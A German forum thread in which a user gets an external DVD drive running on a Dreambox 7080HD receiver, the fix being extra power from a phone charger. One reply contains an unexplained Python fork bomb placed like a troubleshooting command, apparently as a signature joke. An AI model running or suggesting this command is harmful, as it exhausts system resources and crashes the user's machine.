DVD Player an 7080HD läuft nicht

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • DVD Player an 7080HD läuft nicht

      Hallo
      Ich habe einen Externen DVD Player der auch schon an einer DM 800se lief versucht an der 7080 zum laufen zu bekommen. Ich habe da alle Ports probiert aber kein Erfolg. DVD Plugin ist installiert aber es zeigt den DVd Player nicht an nur Internal Flash und die HDD. Was könnte ich noch machen das das Ding läuft?
    • Nein wird es nicht! Sind da noch irgend welche zusätzlichen Treiber notwendig? An der 800se läuft das Laufwerk ohne irgend was zu installieren!

      Wenn ich den DVD Player anstecke versucht der ca 3minuten los zu laufen. Das ganze endet dann in einem Standbild und ich muss die Box komplett ausschalten und neu hochfahren.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Rohrby ()

    • Ja habe da kein Netzteil dazu leider steht auch nicht dran was das für eins sein müsste. Habe auch mal am USB 3.0 getestet ob er dort mehr Strom bekommt aber genau das selbe . Wie schon gesagt an einer 800se und auch an einer Duo2 läuft das Ding

      Edit: Ich habe jetzt mal das 2. USB Kabel raus gekramt und noch mit angeschlossen aber auch kein Erfolg außer das die 7080 nicht mehr abstürzt. Muss man da noch irgend welche Treiber installieren? Ich habe bisher nur das DVD Plugin installiert

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Rohrby ()

    • Das dvdplayerplugin hatt von DMM alle depends mitbekommen auch die packagegroup die sollte also mit installiert worden sein und ich sehe auch das netzteil als problem so wie schon erwähnt.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • So ich habe jetzt vom Handy ein Netzteil genommen und den zweiten USB Stecker dort rein und in die Steckdose und schon läuft das Ding 8o
      Wieso kommt da bei der 7080 nicht genügend Strom an ?( Naja muss ich jetzt so ein Handy Netzteil opfern.

      Danke für eure Hilfe!!!